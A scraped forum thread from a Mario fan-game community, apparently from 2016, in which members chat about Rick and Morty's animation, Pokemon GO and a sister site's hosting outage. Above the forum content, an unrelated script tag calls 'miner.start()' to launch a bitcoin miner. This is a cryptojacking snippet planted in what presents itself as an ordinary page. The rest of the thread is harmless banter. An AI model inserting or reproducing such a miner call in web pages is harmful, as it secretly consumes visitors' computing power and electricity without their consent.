<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralpge project

Random Thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
metasomnia?
the calm before the storm
First name: Meta
Pronouns: he/him/his

Re: Twitter Thread

Postby metasomnia? » 3 years ago

What the hell am I even reading?

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 3 years ago

Ashan wrote:I hate Momumnonuzdays

I feel like I'd love Rick and Morty if I didn't hate the animation style.
I just really don't like the way it looks. Just something about it...
Especially the mouths.

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 3 years ago

TheFinalSentinel wrote:I feel like I'd love Rick and Morty if I didn't hate the animation style.
I just really don't like the way it looks. Just something about it...
Especially the mouths.
That video was the first Rick and Morty clip I've ever actually watched, despite everyone and their dog telling me how great it is, and I was about to post the exact same thing. That animation was just straight ugly.

Ashan
The world has become a place

Postby Ashan » 3 years ago

A lot of the face animation and design comes from the original Rick and Morty animation Justin Roiland did a few years ago to make fun of cease and desist letters or something. It was called Doc and Mharti (being a closer Back to the Future parody) and you can still find it online, although it's pretty raunchy so be warned.

Regardless, they kinda kept some of the art style, like the weird "3"-looking mouth, and the scribbly eyes. I don't think it looks that bad. It kinda fits with how loose some of the scripting is in the show. Like, the clip I posted for that episode in particular, the gimmick was basically they did a bunch of improv voice acting and did animations around it. That's why they're stumbling through lines sometimes, and you can hear him start laughing at the very end of the Gazorpazorpfield clip (when he says "enchiladas")

Le Neveu de Rameau
The Judith Butler of bad puns
First name: Rameau's Nephew

Postby Le Neveu de Rameau » 3 years ago

So, apparently, if a person has a forename of Russian origin, that person has all forenames of Russian origin.

Mata Hari

Postby Mata Hari » 3 years ago

Le Neveu de Rameau wrote:So, apparently, if a person has a forename of Russian origin, that person has all forenames of Russian origin.
Apparently your a wiener

Le Neveu de Rameau

Mata Hari wrote:Apparently your a wiener
I've been to Vienna, like, once, ever.

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Postby Rockythechao » 3 years ago

Peeps are talking about Go and showing off their teams, meanwhile I'm just here and
Last edited by Rockythechao on 08 Jul 2016, 18:23, edited 1 time in total.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

GlitchedGhost

Postby GlitchedGhost » 3 years ago

Rockythechao wrote:Peeps atre talking about Go and sowing off their teams, meanwhile I'm just here and
I'm in Canada and they still haven't released it
Plus I don't have mobile internet so I can only catch Pokemon where there's wifi lmao
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Ivy

Postby Ivy » 3 years ago

GlitchedGhost wrote: Plus I don't have mobile internet so I can only catch Pokemon where there's wifi lmao
same. I doubt the app will ever see use beyond me customizing my trainer with the tiny options available
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

momo

Postby momo » 3 years ago

It's been quite a ride over these last few years, but I'm falling apart and I need to leave. I'll probably still lurk but don't expect me to post any time soon. Sorry.

Alice
Pronouns: Girl person

Postby Alice » 3 years ago

This is some quality tech support. Kinda says a lot about your service when it's making Steam support look good. At this rate the only way my issue is going to actually get resolved is by flat out switching hosting services.

GlitchedGhost

Alice wrote:

This is some quality tech support. Kinda says a lot about your service when it's making Steam support look good. At this rate the only way my issue is going to actually get resolved is by flat out switching hosting services.
LMFAO what the hell is this bullshit, maybe you should just switch

I hope the site comes back soon
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

ZephyrBurst
A Bird Cat
Pronouns: He

Postby ZephyrBurst » 3 years ago

Alice wrote:

I was wondering what had happened to that site. Never made an account, but I totally lurk every few months.

Also, someone took the name ZephyrBurst in Pokemon GO. If anyone finds this person, destroy all their pokemon. Take their pidgeys, caterpies, and anything else they catch, and roast those pokemon over a campfire. Toasted pidgey is a delicacy.

Alice

GlitchedGhost wrote:LMFAO what the hell is this bullshit, maybe you should just switch

I hope the site comes back soon
Really the biggest reason I haven't already is simply because it'd be a waste of money. The server is prepaid through November (I think until the end of December actually) so that'd waste 6 months of server time I paid for. Though at the subglacial pace these morons are moving at it's going to be a waste of that time regardless. I'm going to start looking into less worthless hosts soon and if they still haven't responded by Friday I think I'll get started with backing everything up. Though we will lose a couple of days worth of posts on the forums since my last backup was 2-3 days before it went down but that's still better than the site simply being nonexistent. (Though this might cause some temporary issues for ZephyrBurst since my internet isn't fast enough to reupload all the DT3 files in anything resembling a reasonable pace meaning he'll have to reupload those himself and the files will be down until he can.)
ZephyrBurst wrote:I was wondering what had happened to that site. Never made an account, but I totally lurk every few months.
Speak of the devil, lol. I was planning to pm you about the above info I mentioned before I actually started to deal with transferring files so it wasn't unexpected but I was waiting until I was certain we'd be transferring servers.
Also, someone took the name ZephyrBurst in Pokemon GO. If anyone finds this person, destroy all their pokemon. Take their pidgeys, caterpies, and anything else they catch, and roast those pokemon over a campfire. Toasted pidgey is a delicacy.
I know the feeling. It's very rare that I can get just "Alice" as a username anywhere. I normally have to resort to Alice Cheshire or, less commonly anymore, Alice3173.

Money

Postby Money » 3 years ago

momo wrote:It's been quite a ride over these last few years, but I'm falling apart and I need to leave. I'll probably still lurk but don't expect me to post any time soon. Sorry.
i hope you overcome, wish you well :(

Le Neveu de Rameau

ZephyrBurst wrote:Also, someone took the name ZephyrBurst in Pokemon GO. If anyone finds this person, destroy all their pokemon. Take their pidgeys, caterpies, and anything else they catch, and roast those pokemon over a campfire. Toasted pidgey is a delicacy.
I take it you had to settle for "Ze-fire Boist"?

Mata Hari

Postby Mata Hari » 3 years ago

I can't play Pokemon Go because my phone charges like 1% of the times I plug it in and apparently that shit is a real battery hog

GlitchedGhost

ZephyrBurst wrote:I was wondering what had happened to that site. Never made an account, but I totally lurk every few months.
Come join us nerd
Alice wrote:Really the biggest reason I haven't already is simply because it'd be a waste of money. The server is prepaid through November (I think until the end of December actually) so that'd waste 6 months of server time I paid for. Though at the subglacial pace these morons are moving at it's going to be a waste of that time regardless. I'm going to start looking into less worthless hosts soon and if they still haven't responded by Friday I think I'll get started with backing everything up. Though we will lose a couple of days worth of posts on the forums since my last backup was 2-3 days before it went down but that's still better than the site simply being nonexistent. (Though this might cause some temporary issues for ZephyrBurst since my internet isn't fast enough to reupload all the DT3 files in anything resembling a reasonable pace meaning he'll have to reupload those himself and the files will be down until he can.)
I can understand that, but it's bullshit that it's been almost two weeks without any sort of acknowledgement. I'd rather lose a few days worth of posts than the whole site.
He captured!

ZephyrBurst
A Bird Cat

Le Neveu de Rameau wrote:
ZephyrBurst wrote:Also, someone took the name ZephyrBurst in Pokemon GO. If anyone finds this person, destroy all their pokemon. Take their pidgeys, caterpies, and anything else they catch, and roast those pokemon over a campfire. Toasted pidgey is a delicacy.
I take it you had to settle for "Ze-fire Boist"?
The app ran super slow and crashed periodically so I deleted it.

Le Neveu de Rameau

ZephyrBurst wrote: The app ran super slow and crashed periodically so I deleted it.
Yes, that's what I said about my car, too, but everyone insisted the error was on my end.

Alice

GlitchedGhost wrote:I can understand that, but it's bullshit that it's been almost two weeks without any sort of acknowledgement. I'd rather lose a few days worth of posts than the whole site.
Yeah, same here. It's been kinda obnoxious not being able to post over there and really frustrating getting no response at all from their tech support. (And Iso didn't help much there because he only finally saw my messages I sent to him about the site being down just yesterday...)

Ivy

Postby Ivy » 3 years ago

metasomnia wrote:
ah good avatar my man, I have just completed Dream Land 2
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

ZephyrBurst
A Bird Cat

Le Neveu de Rameau wrote:
ZephyrBurst wrote: The app ran super slow and crashed periodically so I deleted it.
Yes, that's what I said about my car, too, but everyone insisted the error was on my end.
Redownloaded it and tweaked some shit on my phone and now it runs decently-ish. The troubles of a phone with just adequate hardware.

Come up with a car analogy for that.

GlitchedGhost

Alice wrote:Yeah, same here. It's been kinda obnoxious not being able to post over there and really frustrating getting no response at all from their tech support. (And Iso didn't help much there because he only finally saw my messages I sent to him about the site being down just yesterday...)
I've had two dreams about IsoNation being back up. TWO! I'm gonna travel to wherever their tech support is and punch them all in the face.
Jesus Christ, did Iso not check his computer at all for two weeks or something?
He captured!

Return to “the gazebo”